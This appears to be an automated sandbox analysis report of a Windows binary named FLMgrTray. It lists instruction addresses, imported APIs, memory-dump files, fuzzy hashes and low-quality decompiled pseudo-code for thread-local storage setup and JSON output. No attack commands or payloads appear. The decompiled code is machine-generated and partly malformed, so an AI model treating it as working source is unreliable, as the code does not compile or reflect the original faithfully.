                                                                                        0x00000000
                                                                                        0x0016814e
                                                                                        0x0016814e
                                                                                        0x00168150
                                                                                        0x00168151
                                                                                        0x00168157
                                                                                        0x0016816f
                                                                                        0x0016816f
                                                                                        0x00168171
                                                                                        0x00168176
                                                                                        0x00000000
                                                                                        0x00168159
                                                                                        0x00168159
                                                                                        0x0016815c
                                                                                        0x00168161
                                                                                        0x00168164
                                                                                        0x00168167
                                                                                        0x00000000
                                                                                        0x0016816d
                                                                                        0x0016816d
                                                                                        0x00000000
                                                                                        0x0016816d
                                                                                        0x00168167
                                                                                        0x00168157
                                                                                        0x00000000
                                                                                        0x00168179
                                                                                        0x00168179
                                                                                        0x00168180
                                                                                        0x00168187
                                                                                        0x0016818a
                                                                                        0x0016818d
                                                                                        0x0016818d
                                                                                        0x00168191
                                                                                        0x00000000
                                                                                        0x00168191
                                                                                        0x00168144
                                                                                        0x00168101
                                                                                        0x00168101
                                                                                        0x00168102
                                                                                        0x00168104
                                                                                        0x0016810a
                                                                                        0x00168120
                                                                                        0x00168120
                                                                                        0x00168122
                                                                                        0x00168127
                                                                                        0x00000000
                                                                                        0x0016810c
                                                                                        0x0016810c
                                                                                        0x0016810f
                                                                                        0x00168114
                                                                                        0x00168117
                                                                                        0x0016811a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0016811a
                                                                                        0x0016810a
                                                                                        0x00168072
                                                                                        0x00168072
                                                                                        0x00168075
                                                                                        0x00168076
                                                                                        0x0016807c
                                                                                        0x00168094
                                                                                        0x00168094
                                                                                        0x00168096
                                                                                        0x0016809b
                                                                                        0x001680a1
                                                                                        0x00000000
                                                                                        0x0016807e
                                                                                        0x0016807e
                                                                                        0x00168081
                                                                                        0x00168086
                                                                                        0x00168089
                                                                                        0x0016808c
                                                                                        0x00000000
                                                                                        0x00168092
                                                                                        0x00168092
                                                                                        0x00000000
                                                                                        0x00168092
                                                                                        0x0016808c
                                                                                        0x0016807c
                                                                                        0x00168070
                                                                                        0x00167f48
                                                                                        0x00167f48
                                                                                        0x00167f4b
                                                                                        0x00167f4c
                                                                                        0x00167f4e
                                                                                        0x00167f54
                                                                                        0x00167f6a
                                                                                        0x00167f6a
                                                                                        0x00167f6c
                                                                                        0x00167f71
                                                                                        0x00000000
                                                                                        0x00167f56
                                                                                        0x00167f56
                                                                                        0x00167f59
                                                                                        0x00167f5e
                                                                                        0x00167f61
                                                                                        0x00167f64
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00167f64
                                                                                        0x00167f54
                                                                                        0x00000000
                                                                                        0x001681fc
                                                                                        0x00168202
                                                                                        0x00168205
                                                                                        0x0016820b
                                                                                        0x0016820b
                                                                                        0x00168213
                                                                                        0x00168213
                                                                                        0x00168219
                                                                                        0x0016821a
                                                                                        0x00168226
                                                                                        0x0016822e
                                                                                        0x00168236
                                                                                        0x00168242
                                                                                        0x00168246
                                                                                        0x00168252
                                                                                        0x0016825d
                                                                                        0x00168261
                                                                                        0x0016826c
                                                                                        0x00168272
                                                                                        0x00168277
                                                                                        0x0016827a
                                                                                        0x00168280
                                                                                        0x00168282
                                                                                        0x00168289
                                                                                        0x00168290
                                                                                        0x00168294
                                                                                        0x00168297
                                                                                        0x0016829a
                                                                                        0x001682a0
                                                                                        0x001682a0
                                                                                        0x001682a2
                                                                                        0x001682a3
                                                                                        0x001682a3
                                                                                        0x001682ab
                                                                                        0x001682b0
                                                                                        0x001682bc
                                                                                        0x001682cb
                                                                                        0x001682d2
                                                                                        0x001682d8
                                                                                        0x001682de
                                                                                        0x001682e3
                                                                                        0x001682e6
                                                                                        0x001682ea
                                                                                        0x001682f3
                                                                                        0x001682fc
                                                                                        0x00168301
                                                                                        0x0016830d
                                                                                        0x00168314
                                                                                        0x00168321
                                                                                        0x0016832a
                                                                                        0x00168332
                                                                                        0x0016833b
                                                                                        0x00168345
                                                                                        0x0016834d
                                                                                        0x00168359
                                                                                        0x00168360
                                                                                        0x0016836d
                                                                                        0x00168376
                                                                                        0x0016837e
                                                                                        0x00168387
                                                                                        0x00168391
                                                                                        0x0016839c
                                                                                        0x001683a7
                                                                                        0x001683b2
                                                                                        0x001683ba
                                                                                        0x001683c4
                                                                                        0x001683d1
                                                                                        0x001683db
                                                                                        0x00167a27
                                                                                        0x00167a2a
                                                                                        0x00167a2d
                                                                                        0x00167a33
                                                                                        0x00167a40
                                                                                        0x00167a4b
                                                                                        0x00167a4d
                                                                                        0x00167a59
                                                                                        0x00167a5b
                                                                                        0x00167a5d
                                                                                        0x00167a4f
                                                                                        0x00167a4f
                                                                                        0x00167a4f
                                                                                        0x00167a35
                                                                                        0x00167a35
                                                                                        0x00167a35
                                                                                        0x00167a60
                                                                                        0x00167a63
                                                                                        0x00167a71
                                                                                        0x00167a76
                                                                                        0x00167a79
                                                                                        0x00167a7c
                                                                                        0x00167a81
                                                                                        0x00167a82
                                                                                        0x00167a85
                                                                                        0x00167a88
                                                                                        0x00167a89
                                                                                        0x00167a8c
                                                                                        0x00167a91
                                                                                        0x00167a95
                                                                                        0x00167a98
                                                                                        0x00167b01
                                                                                        0x00167b03
                                                                                        0x00167b0f
                                                                                        0x00167b18
                                                                                        0x00167b18
                                                                                        0x00167b1e
                                                                                        0x00167b29
                                                                                        0x00167b33
                                                                                        0x00167a9a
                                                                                        0x00167a9a
                                                                                        0x00167a9e
                                                                                        0x00167aaa
                                                                                        0x00167abb
                                                                                        0x00167ac3
                                                                                        0x00167ac6
                                                                                        0x00167ac7
                                                                                        0x00167acd
                                                                                        0x00167ae1
                                                                                        0x00167ae1
                                                                                        0x00167ae3
                                                                                        0x00167aee
                                                                                        0x00167af8
                                                                                        0x00167acf
                                                                                        0x00167acf
                                                                                        0x00167ad2
                                                                                        0x00167ad5
                                                                                        0x00167ad7
                                                                                        0x00167ada
                                                                                        0x00167add
                                                                                        0x00167afb
                                                                                        0x00000000
                                                                                        0x00167adf
                                                                                        0x00167adf
                                                                                        0x00000000
                                                                                        0x00167adf
                                                                                        0x00167add
                                                                                        0x00167acd
                                                                                        0x00167a98
                                                                                        0x0016798e
                                                                                        0x0016798e
                                                                                        0x00167994
                                                                                        0x00167997
                                                                                        0x0016799c
                                                                                        0x0016799e
                                                                                        0x001679a0
                                                                                        0x001679a0
                                                                                        0x001679a3
                                                                                        0x001679ab
                                                                                        0x001679b0
                                                                                        0x001679d2
                                                                                        0x001679bc
                                                                                        0x001679bf
                                                                                        0x001679cd
                                                                                        0x001679c1
                                                                                        0x001679c3
                                                                                        0x001679c3
                                                                                        0x001679bf
                                                                                        0x001679de
                                                                                        0x001679e3
                                                                                        0x001679ed
                                                                                        0x00167a05
                                                                                        0x00167a15
                                                                                        0x00167a15
                                                                                        0x00167988

                                                                                        APIs
                                                                                        • memmove.VCRUNTIME140(00000005,?,?,?,0000000F,?,curl/,00000005,?,?), ref: 001679DE
                                                                                        • memcpy.VCRUNTIME140(?,00000005,?,00000005,?,?,?,0000000F,?,curl/,00000005,?,?), ref: 001679ED
                                                                                        • memcpy.VCRUNTIME140(?,00000005,?,?,00000005,?,00000005,?,?,?,0000000F,?,curl/,00000005,?,?), ref: 00167A05
                                                                                        • memcpy.VCRUNTIME140(00000000,?,?,?,?,0000000F,?,curl/,00000005,?), ref: 00167A9E
                                                                                        • memcpy.VCRUNTIME140(?,00000005,?,00000000,?,?,?,?,0000000F,?,curl/,00000005,?), ref: 00167AAA
                                                                                        • memcpy.VCRUNTIME140(?,?,?,?,00000005,?,00000000,?,?,?,?,0000000F,?,curl/,00000005,?), ref: 00167ABB
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,0000000F,?,curl/,00000005,?), ref: 00167AFB
                                                                                        • memcpy.VCRUNTIME140(00000000,00000000,?,?,?,0000000F,?,curl/,00000005,?), ref: 00167B03
                                                                                        • memcpy.VCRUNTIME140(?,00000005,?,00000000,00000000,?,?,?,0000000F,?,curl/,00000005,?), ref: 00167B0F
                                                                                        • memcpy.VCRUNTIME140(?,?,?,?,00000005,?,00000000,00000000,?,?,?,0000000F,?,curl/,00000005,?), ref: 00167B1E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$_invalid_parameter_noinfo_noreturnmemmove
                                                                                        • String ID:
                                                                                        • API String ID: 2744272510-0
                                                                                        • Opcode ID: a73e6f94b8d64f0c5d7c3827c39dd560e7d098adcad048b25fe389b2ca6e7182
                                                                                        • Instruction ID: 05b8dd80038fa7d258af3bcc607d5c8307cc1c125a37f66b8f2272c759992b10
                                                                                        • Opcode Fuzzy Hash: a73e6f94b8d64f0c5d7c3827c39dd560e7d098adcad048b25fe389b2ca6e7182
                                                                                        • Instruction Fuzzy Hash: 3C515272604109AFCB14DF6CDC819AEBBB5FF89354B14862AF925C7391D730DA64CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 32%
                                                                                        			E0017FD40(char* _a4, intOrPtr _a8) {
                                                                                        				char _v8;
                                                                                        				char _v16;
                                                                                        				void* _v17;
                                                                                        				char _v24;
                                                                                        				intOrPtr* _v28;
                                                                                        				char* _v32;
                                                                                        				void* _v104;
                                                                                        				signed char _v120;
                                                                                        				void _v124;
                                                                                        				intOrPtr* _v136;
                                                                                        				intOrPtr* _v148;
                                                                                        				signed int* _v152;
                                                                                        				intOrPtr* _v164;
                                                                                        				intOrPtr* _v168;
                                                                                        				void* _v176;
                                                                                        				char _v180;
                                                                                        				char _v184;
                                                                                        				void* _v208;
                                                                                        				void* _v216;
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				signed int _t72;
                                                                                        				intOrPtr _t76;
                                                                                        				char _t79;
                                                                                        				intOrPtr* _t82;
                                                                                        				intOrPtr _t101;
                                                                                        				signed int _t103;
                                                                                        				signed char _t114;
                                                                                        				signed int _t128;
                                                                                        				intOrPtr _t131;
                                                                                        				char* _t134;
                                                                                        				intOrPtr* _t137;
                                                                                        				signed int _t139;
                                                                                        
                                                                                        				_push(0xffffffff);
                                                                                        				_push(E0018E0C9);
                                                                                        				_push( *[fs:0x0]);
                                                                                        				_t72 =  *0x19d05c; // 0x2c80d730
                                                                                        				_push(_t72 ^ _t139);
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_t134 = _a4;
                                                                                        				_t101 = _a8;
                                                                                        				_v32 = _t134;
                                                                                        				_v24 = 0;
                                                                                        				_t103 =  *0x19dc48; // 0x0
                                                                                        				_t76 =  *0x19dff8; // 0x0
                                                                                        				if(_t76 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t103 * 4)) + 4))) {
                                                                                        					E00175B7B(_t76, 0x19dff8);
                                                                                        					__eflags =  *0x19dff8 - 0xffffffff;
                                                                                        					if( *0x19dff8 == 0xffffffff) {
                                                                                        						_v8 = 0;
                                                                                        						E001770A0(0x19dfe0);
                                                                                        						E001759A9(__eflags, E0018ECE0);
                                                                                        						_v8 = 0xffffffff;
                                                                                        						E00175B31(0x19dff8);
                                                                                        					}
                                                                                        				}
                                                                                        				_v184 = 0x1901fc;
                                                                                        				__imp__??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ();
                                                                                        				_v8 = 1;
                                                                                        				_v24 = 2;
                                                                                        				__imp__??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z( &_v180, 0, 0);
                                                                                        				_t79 = _v184;
                                                                                        				_v8 = 2;
                                                                                        				_t17 = _t79 + 4; // 0x50
                                                                                        				 *((intOrPtr*)(_t139 +  *_t17 - 0xb4)) = 0x1901f8;
                                                                                        				_t21 = _v184 + 4; // 0x0
                                                                                        				_t22 =  *_t21 - 0x50; // -80
                                                                                        				_t82 = _t22;
                                                                                        				 *((intOrPtr*)(_t139 +  *_t21 - 0xb8)) = _t82;
                                                                                        				__imp__??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ();
                                                                                        				_v180 = 0x1900a4;
                                                                                        				_v124 = 0;
                                                                                        				_v120 = 4;
                                                                                        				_v8 = 3;
                                                                                        				L0018CA36();
                                                                                        				_v8 = 4;
                                                                                        				L0018CA30();
                                                                                        				L0018CA42();
                                                                                        				_t137 = _t82;
                                                                                        				_v28 = _t137;
                                                                                        				_v8 = 5;
                                                                                        				 *((intOrPtr*)( *_t137 + 4))(_t101,  &_v184, 0x19dfe0);
                                                                                        				_t114 = _v120;
                                                                                        				 *((intOrPtr*)(_t134 + 0x10)) = 0;
                                                                                        				 *((intOrPtr*)(_t134 + 0x14)) = 0xf;
                                                                                        				_v8 = 6;
                                                                                        				 *_t134 = 0;
                                                                                        				_v24 = 0xa;
                                                                                        				if((_t114 & 0x00000002) != 0) {
                                                                                        					L4:
                                                                                        					__eflags = _t114 & 0x00000004;
                                                                                        					if((_t114 & 0x00000004) != 0) {
                                                                                        						goto L8;
                                                                                        					}
                                                                                        					_t128 =  *_v152;
                                                                                        					__eflags = _t128;
                                                                                        					if(_t128 == 0) {
                                                                                        						goto L8;
                                                                                        					}
                                                                                        					_t124 =  *_v168;
                                                                                        					_t130 = _t128 -  *_v168 +  *_v136;
                                                                                        					__eflags = _t128 -  *_v168 +  *_v136;
                                                                                        					goto L7;
                                                                                        				} else {
                                                                                        					_t131 =  *_v148;
                                                                                        					if(_t131 == 0) {
                                                                                        						goto L4;
                                                                                        					}
                                                                                        					_t132 =  <  ? _v124 : _t131;
                                                                                        					_t124 =  *_v164;
                                                                                        					_t130 = ( <  ? _v124 : _t131) -  *_v164;
                                                                                        					L7:
                                                                                        					E00163450(_t101, _t130, _t134, _t124, _t130);
                                                                                        					L8:
                                                                                        					 *((intOrPtr*)( *_t137))(1);
                                                                                        					L0018CA3C();
                                                                                        					_t56 = _v184 + 4; // 0x0
                                                                                        					 *((intOrPtr*)(_t139 +  *_t56 - 0xb4)) = 0x1901f8;
                                                                                        					_t60 = _v184 + 4; // 0x0
                                                                                        					_t61 =  *_t60 - 0x50; // -80
                                                                                        					 *((intOrPtr*)(_t139 +  *_t60 - 0xb8)) = _t61;
                                                                                        					E00165380( &_v180);
                                                                                        					__imp__??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UAE@XZ();
                                                                                        					__imp__??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ();
                                                                                        					 *[fs:0x0] = _v16;
                                                                                        					return _t134;
                                                                                        				}
                                                                                        			}




































                                                                                        0x0017fd43
                                                                                        0x0017fd45
                                                                                        0x0017fd50
                                                                                        0x0017fd5a
                                                                                        0x0017fd61
                                                                                        0x0017fd65
                                                                                        0x0017fd6b
                                                                                        0x0017fd6e
                                                                                        0x0017fd71
                                                                                        0x0017fd74
                                                                                        0x0017fd81
                                                                                        0x0017fd8a
                                                                                        0x0017fd95
                                                                                        0x0017ff50
                                                                                        0x0017ff58
                                                                                        0x0017ff5f
                                                                                        0x0017ff6d
                                                                                        0x0017ff74
                                                                                        0x0017ff7e
                                                                                        0x0017ff88
                                                                                        0x0017ff8f
                                                                                        0x0017ff94
                                                                                        0x0017ff5f
                                                                                        0x0017fd9e
                                                                                        0x0017fda8
                                                                                        0x0017fdb8
                                                                                        0x0017fdc6
                                                                                        0x0017fdcd
                                                                                        0x0017fdd3
                                                                                        0x0017fdd9
                                                                                        0x0017fde0
                                                                                        0x0017fde3
                                                                                        0x0017fdf4
                                                                                        0x0017fdf7
                                                                                        0x0017fdf7
                                                                                        0x0017fdfa
                                                                                        0x0017fe07
                                                                                        0x0017fe0d
                                                                                        0x0017fe17
                                                                                        0x0017fe1e
                                                                                        0x0017fe2b
                                                                                        0x0017fe32
                                                                                        0x0017fe42
                                                                                        0x0017fe46
                                                                                        0x0017fe51
                                                                                        0x0017fe56
                                                                                        0x0017fe58
                                                                                        0x0017fe67
                                                                                        0x0017fe6b
                                                                                        0x0017fe6e
                                                                                        0x0017fe71
                                                                                        0x0017fe78
                                                                                        0x0017fe7f
                                                                                        0x0017fe83
                                                                                        0x0017fe86
                                                                                        0x0017fe90
                                                                                        0x0017feb1
                                                                                        0x0017feb1
                                                                                        0x0017feb4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0017febc
                                                                                        0x0017febe
                                                                                        0x0017fec0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0017fec8
                                                                                        0x0017fed2
                                                                                        0x0017fed2
                                                                                        0x00000000
                                                                                        0x0017fe92
                                                                                        0x0017fe98
                                                                                        0x0017fe9c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0017fea7
                                                                                        0x0017feab
                                                                                        0x0017fead
                                                                                        0x0017fed4
                                                                                        0x0017fed8
                                                                                        0x0017fedd
                                                                                        0x0017fee3
                                                                                        0x0017feeb
                                                                                        0x0017fef6
                                                                                        0x0017fef9
                                                                                        0x0017ff0a
                                                                                        0x0017ff0d
                                                                                        0x0017ff10
                                                                                        0x0017ff1d
                                                                                        0x0017ff28
                                                                                        0x0017ff31
                                                                                        0x0017ff3c
                                                                                        0x0017ff4a
                                                                                        0x0017ff4a

                                                                                        APIs
                                                                                        • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,0019DFE0), ref: 0017FDA8
                                                                                        • ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(?,00000000,00000000), ref: 0017FDCD
                                                                                        • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,0019DFE0), ref: 0017FE07
                                                                                        • ??0StreamWriterBuilder@Json@@QAE@XZ.JSONCPP(?,0019DFE0), ref: 0017FE32
                                                                                        • ??4Value@Json@@QAEAAV01@ABV01@@Z.JSONCPP(0019DFE0), ref: 0017FE46
                                                                                        • ?newStreamWriter@StreamWriterBuilder@Json@@UBEPAVStreamWriter@2@XZ.JSONCPP(0019DFE0), ref: 0017FE51
                                                                                        • ??1StreamWriterBuilder@Json@@UAE@XZ.JSONCPP ref: 0017FEEB
                                                                                        • ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 0017FF28
                                                                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 0017FF31
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: U?$char_traits@$D@std@@@std@@Stream$Json@@$Builder@Writer$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_ostream@?newD@std@@@1@_V01@V01@@V?$basic_streambuf@Value@Writer@Writer@2@
                                                                                        • String ID:
                                                                                        • API String ID: 692335857-0
                                                                                        • Opcode ID: c0a0b303faf54e40ae40c8f6695313af2b2c165f0e48c3676342126761a10941
                                                                                        • Instruction ID: b99ffa2f875ec24d7a90488e337f84297cc10b39892b0ae9a161d37e81a0e278
                                                                                        • Opcode Fuzzy Hash: c0a0b303faf54e40ae40c8f6695313af2b2c165f0e48c3676342126761a10941
                                                                                        • Instruction Fuzzy Hash: 04613774A00208DFDB24DF58CA85B9DB7B6FB54314F2081ADE909A7291DB706A85CF51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • memset.VCRUNTIME140(?,00000000,00000100,?), ref: 00181404
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,?,?), ref: 0018141A
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0018E1D7,?,?,?,?), ref: 0018157D
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001815F6
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00181632
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00181682
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$FileModuleNamememset
                                                                                        • String ID: '$-+ggH
                                                                                        • API String ID: 1148551519-1510651297
                                                                                        • Opcode ID: 6a5eff991e4b09fe66dba580dcf57fa955f77fc61949a25ea7cc0ed25a5ef023
                                                                                        • Instruction ID: 9b4f133aef654f12b15b36ab8f1bcad234f45e93e0c37450da00cf11915ed42d
                                                                                        • Opcode Fuzzy Hash: 6a5eff991e4b09fe66dba580dcf57fa955f77fc61949a25ea7cc0ed25a5ef023
                                                                                        • Instruction Fuzzy Hash: B9D12776D102459BDB05EB34CC867E9B374AF66344F14839AE805B6662FB31ABC2CF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 38%
                                                                                        			E001611C0(void* __ebx, void* __edi, void* __esi) {
                                                                                        				intOrPtr _v8;
                                                                                        				intOrPtr _v12;
                                                                                        				char _v16;
                                                                                        				char _v20;
                                                                                        				intOrPtr _t13;
                                                                                        				intOrPtr _t19;
                                                                                        				intOrPtr _t25;
                                                                                        				long _t32;
                                                                                        				long _t34;
                                                                                        				long _t36;
                                                                                        				long _t39;
                                                                                        				void* _t40;
                                                                                        				long _t41;
                                                                                        				void* _t42;
                                                                                        				void* _t43;
                                                                                        				void* _t46;
                                                                                        				void* _t48;
                                                                                        				void* _t52;
                                                                                        				void* _t53;
                                                                                        
                                                                                        				_t46 = _t52;
                                                                                        				_t53 = _t52 - 8;
                                                                                        				_t32 = TlsAlloc();
                                                                                        				if(_t32 != 0xffffffff) {
                                                                                        					L2:
                                                                                        					 *0x19dfd8 = _t32;
                                                                                        					return E001759A9(_t63, 0x18eb30);
                                                                                        				} else {
                                                                                        					_t39 = GetLastError();
                                                                                        					_t13 = E00181FF0();
                                                                                        					_v12 = _t39;
                                                                                        					_t63 = _t39;
                                                                                        					_v8 = _t13;
                                                                                        					_pop(_t40);
                                                                                        					if(_t39 != 0) {
                                                                                        						E001816E0(__ebx, __eflags,  &_v16, "tss");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						_push(_t46);
                                                                                        						_t48 = _t53;
                                                                                        						_push(_t32);
                                                                                        						_t34 = TlsAlloc();
                                                                                        						__eflags = _t34 - 0xffffffff;
                                                                                        						if(__eflags != 0) {
                                                                                        							L5:
                                                                                        							 *0x19dfd4 = _t34;
                                                                                        							return E001759A9(__eflags, 0x18eb40);
                                                                                        						} else {
                                                                                        							_t41 = GetLastError();
                                                                                        							_t19 = E00181FF0();
                                                                                        							_v16 = _t41;
                                                                                        							__eflags = _t41;
                                                                                        							_v12 = _t19;
                                                                                        							_t42 = _t40;
                                                                                        							if(__eflags != 0) {
                                                                                        								E001816E0(__ebx, __eflags,  &_v20, "tss");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								_push(_t48);
                                                                                        								_push(_t34);
                                                                                        								_t36 = TlsAlloc();
                                                                                        								__eflags = _t36 - 0xffffffff;
                                                                                        								if(__eflags != 0) {
                                                                                        									L8:
                                                                                        									 *0x19dfb8 = _t36;
                                                                                        									return E001759A9(__eflags, 0x18eb50);
                                                                                        								} else {
                                                                                        									_push(_t42);
                                                                                        									_t43 = GetLastError();
                                                                                        									_t25 = E00181FF0();
                                                                                        									_v20 = _t43;
                                                                                        									__eflags = _t43;
                                                                                        									_v16 = _t25;
                                                                                        									if(__eflags != 0) {
                                                                                        										E001816E0(__ebx, __eflags,  &_v20, "tss");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										return E001759A9(__eflags, E0018EB60);
                                                                                        									} else {
                                                                                        										goto L8;
                                                                                        									}
                                                                                        								}
                                                                                        							} else {
                                                                                        								goto L5;
                                                                                        							}
                                                                                        						}
                                                                                        					} else {
                                                                                        						goto L2;
                                                                                        					}
                                                                                        				}
                                                                                        			}






















                                                                                        0x001611c1
                                                                                        0x001611c3
                                                                                        0x001611cd
                                                                                        0x001611d2
                                                                                        0x001611ed
                                                                                        0x001611f2
                                                                                        0x00161204
                                                                                        0x001611d4
                                                                                        0x001611db
                                                                                        0x001611dd
                                                                                        0x001611e2
                                                                                        0x001611e5
                                                                                        0x001611e7
                                                                                        0x001611ea
                                                                                        0x001611eb
                                                                                        0x0016120e
                                                                                        0x00161213
                                                                                        0x00161214
                                                                                        0x00161215
                                                                                        0x00161216
                                                                                        0x00161217
                                                                                        0x00161218
                                                                                        0x00161219
                                                                                        0x0016121a
                                                                                        0x0016121b
                                                                                        0x0016121c
                                                                                        0x0016121d
                                                                                        0x0016121e
                                                                                        0x0016121f
                                                                                        0x00161220
                                                                                        0x00161221
                                                                                        0x00161226
                                                                                        0x0016122d
                                                                                        0x0016122f
                                                                                        0x00161232
                                                                                        0x0016124d
                                                                                        0x00161252
                                                                                        0x00161264
                                                                                        0x00161234
                                                                                        0x0016123b
                                                                                        0x0016123d
                                                                                        0x00161242
                                                                                        0x00161245
                                                                                        0x00161247
                                                                                        0x0016124a
                                                                                        0x0016124b
                                                                                        0x0016126e
                                                                                        0x00161273
                                                                                        0x00161274
                                                                                        0x00161275
                                                                                        0x00161276
                                                                                        0x00161277
                                                                                        0x00161278
                                                                                        0x00161279
                                                                                        0x0016127a
                                                                                        0x0016127b
                                                                                        0x0016127c
                                                                                        0x0016127d
                                                                                        0x0016127e
                                                                                        0x0016127f
                                                                                        0x00161280
                                                                                        0x00161286
                                                                                        0x0016128d
                                                                                        0x0016128f
                                                                                        0x00161292
                                                                                        0x001612ad
                                                                                        0x001612b2
                                                                                        0x001612c4
                                                                                        0x00161294
                                                                                        0x00161294
                                                                                        0x0016129b
                                                                                        0x0016129d
                                                                                        0x001612a2
                                                                                        0x001612a5
                                                                                        0x001612a7
                                                                                        0x001612ab
                                                                                        0x001612ce
                                                                                        0x001612d3
                                                                                        0x001612d4
                                                                                        0x001612d5
                                                                                        0x001612d6
                                                                                        0x001612d7
                                                                                        0x001612d8
                                                                                        0x001612d9
                                                                                        0x001612da
                                                                                        0x001612db
                                                                                        0x001612dc
                                                                                        0x001612dd
                                                                                        0x001612de
                                                                                        0x001612df
                                                                                        0x001612eb
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x001612ab
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0016124b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x001611eb

                                                                                        APIs
